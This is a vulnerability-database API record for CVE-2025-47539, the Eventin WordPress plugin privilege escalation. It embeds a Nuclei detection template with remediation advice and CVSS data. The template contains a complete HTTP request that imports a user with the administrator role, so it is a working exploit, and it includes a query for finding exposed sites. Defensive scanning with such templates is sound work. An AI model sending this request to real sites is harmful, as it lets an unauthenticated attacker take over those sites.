{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2025-47539/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2025-47539/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2025-47539/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2025-47539/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2025-47539/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2025-47539"},"sightings":{"href":"/api/v1/sightings/cve-2025-47539"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2025/CVE-2025-47539.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2025-47539\n\ninfo:\n  name: Eventin <= 4.0.26 - Privilege Escalation\n  author: pdresearch\n  severity: critical\n  description: |\n    The Eventin WordPress plugin before 4.0.27 suffers from an unauthenticated privilege escalation vulnerability. Due to a missing permission check in the a REST API endpoint, unauthenticated attackers can import users with arbitrary roles, including administrator, leading to full site compromise.\n  impact: |\n    Unauthenticated attackers can import users with arbitrary roles including administrator through a missing permission check in the REST API, leading to full site compromise.\n  remediation: |\n    Upgrade Eventin WordPress plugin to version 4.0.27 or later that implements proper permission checks on user import endpoints.\n  reference:\n    - https://patchstack.com/database/vulnerability/eventin/wordpress-eventin-plugin-4-0-26-unauthenticated-privilege-escalation-vulnerability\n    - https://themewinter.com/eventin/\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-47539\n  classification:\n    epss-score: 0.27878\n    epss-percentile: 0.98031\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2025-47539\n    cwe-id: CWE-269\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: themewinter\n    product: eventin\n    fofa-query: body=\"/wp-content/plugins/eventin\"\n  tags: cve,cve2025,wordpress,wp,wp-plugin,eventin,vkev,vuln\n\nvariables:\n  name: \"{{randbase(5)}}\"\n  oast: \"oast.fun\"\n\nhttp:\n  - raw:\n      - |\n        POST /wp-json/eventin/v2/speakers/import?_locale=user HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryS5Gx6VCxm3HMV2A9\n\n        ------WebKitFormBoundaryS5Gx6VCxm3HMV2A9\n        Content-Disposition: form-data; name=\"speaker_import\"; filename=\"speakers.json\"\n        Content-Type: application/json\n\n        [\n          {\n            \"id\": \"999\",\n            \"name\": \"{{name}}\",\n            \"email\": \"{{name}}@{{oast}}\",\n            \"image\": \"\",\n            \"designation\": \"test\",\n            \"summary\": \"\",\n            \"social\": [\n              []\n            ],\n            \"company_logo\": \"\",\n            \"company_url\": \"\",\n            \"speaker_group\": \"\",\n            \"speaker_category\": [\n              \"speaker\"\n            ],\n            \"company_name\": \"\",\n            \"author_url\": \"\",\n            \"role\": \"administrator\"\n          }\n        ]\n        ------WebKitFormBoundaryS5Gx6VCxm3HMV2A9--\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"Successfully imported speaker\")'\n          - 'contains(content_type, \"application/json\")'\n          - 'status_code == 200'\n        condition: and\n\n    extractors:\n      - type: dsl  # type of the extractor\n        dsl:\n          - '\"Email: \" + name + \"@\" + oast'  # the variable to extract\n# digest: 4a0a0047304502200b458df2454c50130257240fa8c2721dc506d6106f912cdf320a873e6900a3d1022100a6fa3f7d0a3fe0c095cc95980b902f9cc271f51a85b9e3bbbe96f2b24b45a0ac:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2025-47539"}